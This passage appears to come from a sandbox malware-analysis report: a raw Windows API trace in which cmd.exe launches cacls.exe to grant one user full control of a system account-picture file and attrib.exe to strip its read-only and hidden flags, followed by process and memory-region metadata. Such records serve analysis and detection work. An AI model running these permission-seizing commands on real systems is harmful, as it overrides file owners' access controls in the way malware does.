lpFilePart=0x2cfb34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfb34*="Desktop") returned 0x18 [0183.958] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.958] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf8b4 | out: lpFindFileData=0x2cf8b4) returned 0x90ae8 [0183.958] FindClose (in: hFindFile=0x90ae8 | out: hFindFile=0x90ae8) returned 1 [0183.958] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf8b4 | out: lpFindFileData=0x2cf8b4) returned 0x90ae8 [0183.958] FindClose (in: hFindFile=0x90ae8 | out: hFindFile=0x90ae8) returned 1 [0183.958] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf8b4 | out: lpFindFileData=0x2cf8b4) returned 0x90ae8 [0183.958] FindClose (in: hFindFile=0x90ae8 | out: hFindFile=0x90ae8) returned 1 [0183.959] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.959] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0183.959] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0183.959] GetEnvironmentStringsW () returned 0x90308* [0183.959] FreeEnvironmentStringsW (penv=0x90308) returned 1 [0183.959] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.959] GetConsoleOutputCP () returned 0x1b5 [0183.959] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.959] GetUserDefaultLCID () returned 0x409 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfc78, cchData=128 | out: lpLCData="0") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfc78, cchData=128 | out: lpLCData="0") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, 
lpLCData=0x2cfc78, cchData=128 | out: lpLCData="1") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0183.960] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0183.961] GetConsoleTitleW (in: lpConsoleTitle=0x809b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.961] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0183.961] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0183.961] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0183.962] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="EEBsYm5") returned 0x7 [0183.962] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0183.962] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0183.962] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0183.963] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0183.963] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0183.963] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0183.963] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0183.965] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0183.965] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0183.965] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0183.965] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0183.965] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0183.965] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0183.965] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0183.967] GetConsoleTitleW (in: lpConsoleTitle=0x2cf90c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.968] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.968] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.968] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.968] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.968] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.968] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.968] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.968] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.968] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.968] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.968] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.968] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="DATE") returned 
-1 [0183.968] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.968] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.968] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.968] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.968] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.968] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.968] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.968] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.968] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.968] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.968] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.968] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.968] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.968] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.968] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.968] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.968] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.968] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.968] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.968] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.968] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.968] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.968] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.968] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.968] _wcsicmp (_String1="CACLS", _String2="MKLINK") 
returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.969] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.969] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.969] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.969] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.969] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.969] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.969] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.969] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.969] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.969] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.969] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.969] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.969] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.969] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.969] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.969] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.969] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.969] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.969] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.969] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.969] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.969] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.969] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") 
returned -16 [0183.969] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.969] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.969] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.969] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.969] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.969] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.969] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.969] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.969] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.969] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0183.969] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0183.969] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0183.970] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0183.970] SetErrorMode (uMode=0x0) returned 0x0 [0183.970] SetErrorMode (uMode=0x1) returned 0x0 [0183.970] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x91e98, lpFilePart=0x2cf42c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf42c*="Desktop") returned 0x18 [0183.970] SetErrorMode (uMode=0x0) returned 0x1 [0183.970] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.970] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.975] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.976] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0183.976] GetLastError () returned 0x2 [0183.976] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0183.976] GetLastError () returned 0x2 [0183.976] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0x92180 [0183.976] FindClose (in: hFindFile=0x92180 | out: hFindFile=0x92180) returned 1 [0183.976] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0183.977] GetLastError () returned 0x2 [0183.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0x92180 [0183.977] FindClose (in: hFindFile=0x92180 | out: hFindFile=0x92180) returned 1 [0183.977] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.977] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.977] GetConsoleTitleW (in: lpConsoleTitle=0x2cf6a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.074] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf528, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf5f0 | out: lpAttributeList=0x2cf528, lpSize=0x2cf5f0) returned 1 [0184.074] 
UpdateProcThreadAttribute (in: lpAttributeList=0x2cf528, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf5e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf528, lpPreviousValue=0x0) returned 1 [0184.074] GetStartupInfoW (in: lpStartupInfo=0x2cf4e4 | out: lpStartupInfo=0x2cf4e4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.074] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.075] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf584*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf5d0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2cf5d0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcec, dwThreadId=0xd4c)) returned 1 [0184.078] CloseHandle (hObject=0x4c) returned 1 [0184.078] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.078] GetEnvironmentStringsW () returned 0x90308* [0184.078] 
FreeEnvironmentStringsW (penv=0x90308) returned 1 [0184.079] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0184.278] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf4c4 | out: lpExitCode=0x2cf4c4*=0x0) returned 1 [0184.278] CloseHandle (hObject=0x50) returned 1 [0184.278] _vsnwprintf (in: _Buffer=0x2cf60c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf4d0 | out: _Buffer="00000000") returned 8 [0184.278] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0184.279] GetEnvironmentStringsW () returned 0x92410* [0184.279] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.279] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.279] GetEnvironmentStringsW () returned 0x92410* [0184.279] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.279] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf528 | out: lpAttributeList=0x2cf528) [0184.279] GetConsoleTitleW (in: lpConsoleTitle=0x2cf90c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.279] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.279] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.279] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.280] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0184.280] GetLastError () returned 0x2 [0184.280] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0184.280] GetLastError () returned 0x2 [0184.280] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0x8e4d8 [0184.280] FindClose (in: hFindFile=0x8e4d8 | out: hFindFile=0x8e4d8) returned 1 [0184.280] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0184.281] GetLastError () returned 0x2 [0184.281] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0x8e4d8 [0184.281] FindClose (in: hFindFile=0x8e4d8 | out: hFindFile=0x8e4d8) returned 1 [0184.281] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.281] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.281] GetConsoleTitleW (in: lpConsoleTitle=0x2cf6a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.281] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf528, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf5f0 | out: lpAttributeList=0x2cf528, lpSize=0x2cf5f0) returned 1 [0184.281] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf528, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf5e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf528, lpPreviousValue=0x0) returned 1 [0184.281] GetStartupInfoW (in: lpStartupInfo=0x2cf4e4 | out: lpStartupInfo=0x2cf4e4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.281] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.281] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf584*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf5d0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", lpProcessInformation=0x2cf5d0*(hProcess=0x4c, hThread=0x50, dwProcessId=0xcf0, dwThreadId=0xea4)) returned 1 [0184.283] CloseHandle (hObject=0x50) returned 1 [0184.283] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.283] GetEnvironmentStringsW () returned 0x92410* [0184.284] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.284] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0184.345] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cf4c4 | out: lpExitCode=0x2cf4c4*=0x0) returned 1 [0184.345] CloseHandle (hObject=0x4c) returned 1 [0184.345] _vsnwprintf (in: _Buffer=0x2cf60c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf4d0 | out: _Buffer="00000000") returned 8 [0184.345] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 
1 [0184.345] GetEnvironmentStringsW () returned 0x92410* [0184.345] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.345] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.345] GetEnvironmentStringsW () returned 0x92410* [0184.345] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.345] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf528 | out: lpAttributeList=0x2cf528) [0184.345] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.345] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.346] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.346] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0184.346] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.346] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0184.346] SetConsoleInputExeNameW () returned 0x1 [0184.346] GetConsoleOutputCP () returned 0x1b5 [0184.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.346] exit (_Code=0) Process: id = "362" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xcec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "361" os_parent_pid = "0x5d0" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM 
Authentication" [0x7] Region: id = 26135 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26137 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26138 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26139 start_va = 0xef0000 end_va = 0xef8fff entry_point = 0xef0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26140 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26141 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26142 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26143 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 26144 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26145 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26146 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 
